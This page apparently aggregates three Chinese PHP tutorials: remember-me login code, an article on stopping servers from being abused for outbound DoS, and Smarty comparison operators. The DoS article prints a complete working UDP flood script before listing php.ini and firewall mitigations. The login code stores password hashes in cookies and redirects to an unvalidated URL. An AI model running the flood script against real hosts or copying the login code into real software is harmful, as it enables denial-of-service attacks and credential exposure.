php中实现记住密码自动登录的...-防止用户利用PHP代码DOS造成用...-php Smarty 字符比较代码

当前位置: 编程技术>php

本页文章导读:

▪php中实现记住密码自动登录的代码 php实现记住密码自动登录方法不止一个，下面出现有二个emptyempty，其实是一个，那是因为代码高亮有bug。希望对大家有帮助。一，用户登录的check 代码如下: //检查用户是否登录 function chec.........

▪防止用户利用PHP代码DOS造成用光网络带宽用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 代码如下: $packets = 0; $ip = $_GET[\'ip\']; $rand = $_GET[\'port\']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET[\'time\']; $time = tim.........

▪php Smarty 字符比较代码 eq相等， ne、neq不相等， gt大于， lt小于， gte、ge大于等于， lte、le 小于等于， not非， mod求模。 is [not] div by是否能被某数整除， is [not] even是否为偶数， $a is [not] even by $b即($a / $b) % 2 == 0.........

[1]php中实现记住密码自动登录的代码

来源: 互联网发布时间: 2013-11-30

php实现记住密码自动登录方法不止一个，下面出现有二个emptyempty，其实是一个，那是因为代码高亮有bug。希望对大家有帮助。

一，用户登录的check

代码如下:

//检查用户是否登录
function checklogin(){
if(emptyempty($_SESSION['user_info'])){ //检查一下session是不是为空
if(emptyempty($_COOKIE['username']) || emptyempty($_COOKIE['password'])){ //如果session为空，并且用户没有选择记录登录状
header(”location:login.php?req_url=”.$_SERVER['REQUEST_URI']); //转到登录页面，记录请求的url，登录后跳转过去，用户体验好。
}else{ //用户选择了记住登录状态
$user = getUserInfo($_COOKIE['username'],$_COOKIE['password']); //去取用户的个人资料
if(emptyempty($user)){ //用户名密码不对没到取到信息，转到登录页面
header(”location:login.php?req_url=”.$_SERVER['REQUEST_URI']);
}else{
$_SESSION['user_info'] = $user; //用户名和密码对了，把用户的个人资料放到session里面
}
}
}
}
//检查用户是否登录
function checklogin(){
if(empty($_SESSION['user_info'])){ //检查一下session是不是为空
if(empty($_COOKIE['username']) || empty($_COOKIE['password'])){ //如果session为空，并且用户没有选择记录登录状
header(”location:login.php?req_url=”.$_SERVER['REQUEST_URI']); //转到登录页面，记录请求的url，登录后跳转过去，用户体验好。
}else{ //用户选择了记住登录状态
$user = getUserInfo($_COOKIE['username'],$_COOKIE['password']); //去取用户的个人资料
if(empty($user)){ //用户名密码不对没到取到信息，转到登录页面
header(”location:login.php?req_url=”.$_SERVER['REQUEST_URI']);
}else{
$_SESSION['user_info'] = $user; //用户名和密码对了，把用户的个人资料放到session里面
}
}
}
}

在访问后台的每个页面时，都要先进行上面的检查

二，用户提交登录信息
当用户填写用户名和密码后就提交到这儿来，

代码如下:

$username = trim($_POST['username']);
$password = md5(trim($_POST['password']));
$validatecode = $_POST['validateCode'];
$ref_url = $_GET['req_url'];
$remember = $_POST['remember'];

$err_msg = ”;
if($validatecode!=$_SESSION['checksum']){
$err_msg = “验证码不正确”;
}elseif($username==” || $password==”){
$err_msg = “用户名和密码都不能为空”;
}else{
$row = getUserInfo($username,$password);

if(emptyempty($row)){
$err_msg = “用户名和密码都不正确”;
}else{
$_SESSION['user_info'] = $row;
if(!emptyempty($remember)){ //如果用户选择了，记录登录状态就把用户名和加了密的密码放到cookie里面
setcookie(”username”, $username, time()+3600*24*365);
setcookie(”password”, $password, time()+3600*24*365);
}
if(strpos($ref_url,”login.php”) === false){
header(”location:”.$ref_url);
}else{
header(”location:main_user.php”);
}
}
}
$username = trim($_POST['username']);
$password = md5(trim($_POST['password']));
$validatecode = $_POST['validateCode'];
$ref_url = $_GET['req_url'];
$remember = $_POST['remember'];

$err_msg = ”;
if($validatecode!=$_SESSION['checksum']){
$err_msg = “验证码不正确”;
}elseif($username==” || $password==”){
$err_msg = “用户名和密码都不能为空”;
}else{
$row = getUserInfo($username,$password);

if(empty($row)){
$err_msg = “用户名和密码都不正确”;
}else{
$_SESSION['user_info'] = $row;
if(!empty($remember)){ //如果用户选择了，记录登录状态就把用户名和加了密的密码放到cookie里面
setcookie(”username”, $username, time()+3600*24*365);
setcookie(”password”, $password, time()+3600*24*365);
}
if(strpos($ref_url,”login.php”) === false){
header(”location:”.$ref_url);
}else{
header(”location:main_user.php”);
}
}
}

关于$ref_url简单解释一下，假如：用户A访问b.php，但是A用户没有登录，跳转到登录页面login.php，在登录页面填完用户和密码后，确定后又跳转到b.php这个页面，而不是跳转一个默认的页面main_user.php。因为b.php是用户A想去的那个页面，所以用户体验会好一点。

三，当用户点退出时，清出记录登录状态

为什么要这样做呢，因为如果有别人用你的电脑的话，他们有可能会浏览到你的个人隐私，所以当用户特意点了退出时，最好是把记录登录状态取消掉。

代码如下:

//退出登录
function logout(){
unset($_SESSION['user_info']);
if(!emptyempty($_COOKIE['username']) || emptyempty($_COOKIE['password'])){
setcookie(”username”, null, time()-3600*24*365);
setcookie(”password”, null, time()-3600*24*365);
}
}

[2]防止用户利用PHP代码DOS造成用光网络带宽

来源: 互联网发布时间: 2013-11-30

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:

代码如下:

$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>

表现特征:
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
解决办法:
禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词

[3]php Smarty 字符比较代码

来源: 互联网发布时间: 2013-11-30

eq相等，
ne、neq不相等，
gt大于，
lt小于，
gte、ge大于等于，
lte、le 小于等于，
not非， mod求模。
is [not] div by是否能被某数整除，
is [not] even是否为偶数，
$a is [not] even by $b即($a / $b) % 2 == 0，
is [not] odd是否为奇，
$a is not odd by $b即($a / $b) % 2 != 0 示例：
equal/ not equal/ greater than/ less than/ less than or equal/ great than or equal/后面的就不用说了
Smarty 中的 if 语句和 php 中的 if 语句一样灵活易用，并增加了几个特性以适宜模板引擎. if 必须于 /if 成对出现. 可以使用 else 和 elseif 子句. 可以使用以下条件修饰词：eq、ne、neq、gt、lt、lte、le、gte、ge、is even、is odd、is not even、is not odd、not、mod、div by、even by、odd by、==、!=、>、<、<=、>=. 使用这些修饰词时必须和变量或常量用空格格开.

Example 7-11. if statements
例 7-11. if 语句演示

{if $name eq "Fred"}
Welcome Sir.
{elseif $name eq "Wilma"}
Welcome Ma'am.
{else}
Welcome, whatever you are.
{/if}

{* an example with "or" logic *}
{if $name eq "Fred" or $name eq "Wilma"}
...
{/if}

{* same as above *}
{if $name == "Fred" || $name == "Wilma"}
...
{/if}

{* the following syntax will NOT work, conditional qualifiers
must be separated from surrounding elements by spaces *}
{if $name=="Fred" || $name=="Wilma"}
...
{/if}

{* parenthesis are allowed *}
{if ( $amount < 0 or $amount > 1000 ) and $volume >= #minVolAmt#}
...
{/if}

{* you can also embed php function calls *}
{if count($var) gt 0}
...
{/if}

{* test if values are even or odd *}
{if $var is even}
...
{/if}
{if $var is odd}
...
{/if}
{if $var is not odd}
...
{/if}

{* test if var is divisible by 4 *}
{if $var is div by 4}
...
{/if}

{* test if var is even, grouped by two. i.e.,
0=even, 1=even, 2=odd, 3=odd, 4=even, 5=even, etc. *}
{if $var is even by 2}
...
{/if}

{* 0=even, 1=even, 2=even, 3=odd, 4=odd, 5=odd, etc. *}
{if $var is even by 3}
...
{/if}